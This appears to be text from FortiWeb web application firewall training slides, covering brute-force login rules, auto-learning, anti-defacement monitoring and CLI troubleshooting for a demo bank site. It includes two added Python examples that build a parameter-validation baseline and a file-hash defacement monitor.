Configuring Brute Force Login Rule (3)
Apply the Brute Force Login rule to xbank_web_protection
Access http://www.xbank.com/login.html
Refresh your browser as fast as you can until you get banned for 10 seconds (F5, Command + R, etc.)
Configuring Brute Force Login Rule > Review Attack Log
Auto-Learning
FortiWeb Learning Mode
FortiWeb Deployment Auto-Learning
Any WAF deployment requires some knowledge of the application. This adds complexity to the deployment.
Auto-Learning is a mode that can help during the deployment phase to create a baseline based on the observed behavior of the application.
Configuring Auto-Learning
1. Go to Auto Learn > Auto Learn Profile > Default Auto Learn Profile and create a new Inline Profile named xbank-auto
2. Go to Server Policy > Policy, edit xbank_web_policy and assign:
Web Protection Profile: Inline Alert Only
WAF Auto Learn Profile: xbank-auto
Configuring Auto-Learning > Create a new Profile (2)
1. Name Profile
2. Specify Profile Settings
3. Click OK to save
Configuring Auto-Learning > Check Session Management
1. Go to Inline Protection Profile
2. Edit xbank_web_protection
3. Make sure Session Management is Enabled
Configuring Auto-Learning > Apply new Auto Learn Profile
1. Go to Server Policy
2. Edit xbank_web_policy
3. Select Auto Learn Profile
4. Enable Monitoring Mode
Configuring Auto-Learning > Test WAF Auto Learn Profile
1. Access the XBANK site and navigate through it. Try to access every page, make transfers, update your profile, etc.
2. Go to Auto Learn > Auto Learn Report in the FortiWeb
3. Review the report automatically generated by the auto-learn feature
4. Download the report as PDF and review it
5. Note that it is possible to edit and adjust some of the results
6. Generate a configuration based on the Auto-Learn report
Configuring Auto-Learning > Auto Learn Report
1. Generate Config
2. Name Profile
3. Click OK to save
Pay special attention to the Parameters Validation rules
Configuring Auto-Learning > Review generated configuration
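What the auto-learn report turns into Parameters Validation rules, shown as an added example that is not FortiWeb's auto-learn implementation. It assumes a request is observed as (method, path, parameters), that the learned rule for each (path, parameter) pair is the set of value types seen plus the longest value seen widened by a slack margin, and uses constructed lab traffic for the monitoring phase.

```python
"""Added example, not FortiWeb's auto-learn code: learn a parameter
validation baseline from traffic seen in monitoring mode, generate rules
from it, then check later requests against those rules.

Assumptions (mine, not from the deck): a request is (method, path, params);
the learned rule for each (path, parameter) is the set of value types seen
and the longest value seen, widened by LENGTH_SLACK.
"""
import re
from collections import defaultdict

# Ordered from most to least specific; the first match names the value type.
TYPE_PATTERNS = [
    ("integer", re.compile(r"^-?\d+$")),
    ("email",   re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")),
    ("alpha",   re.compile(r"^[A-Za-z]+$")),
    ("alnum",   re.compile(r"^[A-Za-z0-9_-]+$")),
    ("text",    re.compile(r"^[^<>\"'`;]*$")),
]
LENGTH_SLACK = 1.5  # constructed margin over the longest learned value


def classify_value(value):
    """Name the narrowest type pattern a value satisfies ('any' if none)."""
    for name, pattern in TYPE_PATTERNS:
        if pattern.match(value):
            return name
    return "any"


def learn_baseline(requests):
    """Monitoring phase: record value types and max length per (path, parameter)."""
    baseline = defaultdict(lambda: {"types": set(), "max_len": 0})
    for _method, path, params in requests:
        for name, value in params.items():
            entry = baseline[(path, name)]
            entry["types"].add(classify_value(value))
            entry["max_len"] = max(entry["max_len"], len(value))
    return dict(baseline)


def generate_rules(baseline):
    """Generate Config step: keep the learned types, widen max length by the slack."""
    return {key: {"types": set(entry["types"]),
                  "max_len": int(entry["max_len"] * LENGTH_SLACK) + 1}
            for key, entry in baseline.items()}


def validate(rules, request):
    """Return the list of rule violations for one request (empty if clean)."""
    _method, path, params = request
    violations = []
    for name, value in params.items():
        rule = rules.get((path, name))
        if rule is None:
            violations.append(f"{path}: unexpected parameter '{name}'")
            continue
        if len(value) > rule["max_len"]:
            violations.append(f"{path}: '{name}' length {len(value)} exceeds {rule['max_len']}")
        kind = classify_value(value)
        if kind not in rule["types"]:
            violations.append(f"{path}: '{name}' type {kind} not in {sorted(rule['types'])}")
    return violations


# Constructed sample of legitimate lab traffic recorded during monitoring mode.
LEARNED_TRAFFIC = [
    ("POST", "/login.html", {"username": "alice", "password": "Winter2019"}),
    ("POST", "/login.html", {"username": "bob", "password": "hunter22"}),
    ("POST", "/transfer.html", {"to_account": "10023", "amount": "250"}),
    ("POST", "/transfer.html", {"to_account": "10088", "amount": "1200"}),
    ("POST", "/profile.html", {"email": "alice@example.com", "phone": "5551234567"}),
]
RULES = generate_rules(learn_baseline(LEARNED_TRAFFIC))

if __name__ == "__main__":
    for key, rule in sorted(RULES.items()):
        print(key, sorted(rule["types"]), "max_len", rule["max_len"])
    print(validate(RULES, ("POST", "/transfer.html",
                           {"to_account": "ten-thousand-twenty-three", "amount": "250"})))
```

This is why the slide says to review the generated Parameters Validation rules before enabling them: a baseline learned from too little traffic (one user, one account number length) produces rules that are narrower than the real application, so legitimate requests would be flagged until the rules are widened by hand.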
Anti-Defacement Tool
Web Defacement
A website defacement is an attack on a website that changes the visual appearance of the site or a webpage.
FortiWeb Anti-Defacement Tool
FortiWeb has an Anti-Defacement tool that recognizes when a web site file has been changed and reacts accordingly:
1. Backs up and creates a hash for each site object
2. Monitors each object, comparing its hash with the one registered
3. If any change: alert and manually recover the changed file, or automatically recover the changed file
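The three steps above, backup and hash, monitor and compare, alert and restore, carried out on a local directory as an added example (this is not FortiWeb's anti-defacement code). The policy on the following slides asks for a folder and credentials because FortiWeb reaches the web server remotely; this example assumes the site root is a local directory, uses SHA-256 as the hash and keeps the backup as a plain copy of the tree.

```python
"""Added example (not FortiWeb's anti-defacement implementation): back up
and hash every site object, re-hash on each monitoring interval and compare
with the registered hashes, then alert and optionally restore the backup.

Assumptions (mine): the site root is a local directory, SHA-256 is the
hash, and the backup is a plain copy of the tree.
"""
import hashlib
import os
import shutil
import tempfile


def hash_file(path):
    """SHA-256 of a file, read in chunks so large objects do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(site_root, backup_root):
    """Step 1: copy every site object to backup_root and register its hash."""
    hashes = {}
    for dirpath, _dirs, files in os.walk(site_root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, site_root)
            dest = os.path.join(backup_root, rel)
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            shutil.copy2(full, dest)
            hashes[rel] = hash_file(full)
    return hashes


def check(site_root, baseline):
    """Step 2: re-hash the live tree and report changed, deleted and added objects."""
    current = {}
    for dirpath, _dirs, files in os.walk(site_root):
        for name in files:
            full = os.path.join(dirpath, name)
            current[os.path.relpath(full, site_root)] = hash_file(full)
    return {
        "changed": sorted(r for r in baseline if r in current and current[r] != baseline[r]),
        "deleted": sorted(r for r in baseline if r not in current),
        "added": sorted(r for r in current if r not in baseline),
    }


def restore(site_root, backup_root, report, auto_restore=True):
    """Step 3: raise an alert per finding; with auto restore, put the backup copy back."""
    alerts = []
    for rel in report["changed"] + report["deleted"]:
        alerts.append(f"ALERT defacement: {rel}")
        if auto_restore:
            dest = os.path.join(site_root, rel)
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            shutil.copy2(os.path.join(backup_root, rel), dest)
    for rel in report["added"]:
        alerts.append(f"ALERT unexpected new file: {rel}")
        if auto_restore:
            os.remove(os.path.join(site_root, rel))
    return alerts


def demo():
    """Constructed run: build a tiny site, alter login.html, detect it and restore."""
    work = tempfile.mkdtemp()
    site, backup = os.path.join(work, "site"), os.path.join(work, "backup")
    os.makedirs(os.path.join(site, "img"))
    with open(os.path.join(site, "login.html"), "w") as f:
        f.write("<html><body>XBANK login</body></html>")
    with open(os.path.join(site, "img", "logo.txt"), "w") as f:
        f.write("logo")
    baseline = snapshot(site, backup)
    with open(os.path.join(site, "login.html"), "w") as f:  # the lab's edit to login.html
        f.write("<html><body>changed content</body></html>")
    before = check(site, baseline)
    alerts = restore(site, backup, before)
    after = check(site, baseline)
    shutil.rmtree(work)
    return before, alerts, after


if __name__ == "__main__":
    print(demo())
```

The monitor interval on the policy is the trade-off visible here: every check walks and re-hashes the whole tree, so a short interval means quick detection at the cost of constant reads on the web server. Keeping the baseline and backup off the web server itself matters, since an attacker who can change login.html could otherwise change the registered hashes as well.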
Configure Anti-Defacement Tool
1. Go to Web Anti-Defacement
2. Create New
Configure Anti-Defacement Tool > Create Policy
Go to Web Site with Anti-Defacement & Create New Policy
Name Policy
Set Monitor Intervals
Enable Auto Restore
Click OK to save
Test Connection
  o Enable Monitoring
  o Define folder to monitor
  o Specify credentials used for monitoring
Configure Anti-Defacement Tool > Review (2)
Inspect the policy details and statistics
Configure Anti-Defacement Tool > Review (3)
Inspect the list of protected files and their attributes
Configure Anti-Defacement Tool > Review (4)
1. Edit the login.html file and change something in its content
2. Wait until you see that one file has been detected as changed
3. Inspect the changes by clicking on the Total Changed files number
4. Access the XBANK site and you will see the defaced site
Review the log file and verify the defacement event
Configure Anti-Defacement Tool (8)
FortiWeb Basic Troubleshooting
Get System Status
# get system status
Get System Performance
# get system performance
Get System Global
# get system global
System Top
# diag system top
Columns: process name, process ID, state, CPU usage, memory usage.
Pressing q sorts by processor or memory consumption.
# diag system kill
diag system kill (process ID)
System Flash List
# diag system flash list
Shows the different partitions and the firmware versions running on each. They are shown when the unit is upgraded; for example, if an upgrade does not go well, you can roll back to the previous version using the copy the unit saved before moving to the newer version.
Execute Options
# execute ?
When ping-options is modified, traceroute is also run from the same source as ping.
When a FortiGate or FortiWeb is first registered, to avoid the FortiGuard registration waiting time use:
exec update-av
exec update-ips
exec update-now
Resetting the log disk requires a reboot.
Execute Ping
# execute ping
Execute Traceroute
# execute traceroute
FortiWeb Advanced Troubleshooting
Diagnose Commands
CLI command trees: diagnose, get
Commonly used sub-branches
Numerous options/parameters viewed with ?
diag network sniffer
diag system
diag debug
diag application
get log
get sys
Diagnose Debug Flow
# diagnose debug flow filter clear
# diagnose debug flow policy client-ip
# diagnose debug flow policy direction {both | client-to-server | server-to-client}
# diagnose debug flow policy server-ip
# diagnose debug flow filter server-ip 2.2.128 (physical/real IP)
# diagnose debug flow show module-process-detail on
# diagnose debug flow trace start
# diagnose debug enable
http://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.html
Diagnose Debug Flow
We must see:
Crash Log
# diagnose debug crashlog read
Use this command to show crash logs from application proxies that have call back traces, segmentation faults, or memory register dumps, or to delete the crash log.
Diagnose Debug Application
# diagnose debug application autolearn [{-1 | 0}]
http://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_application_autolearn.html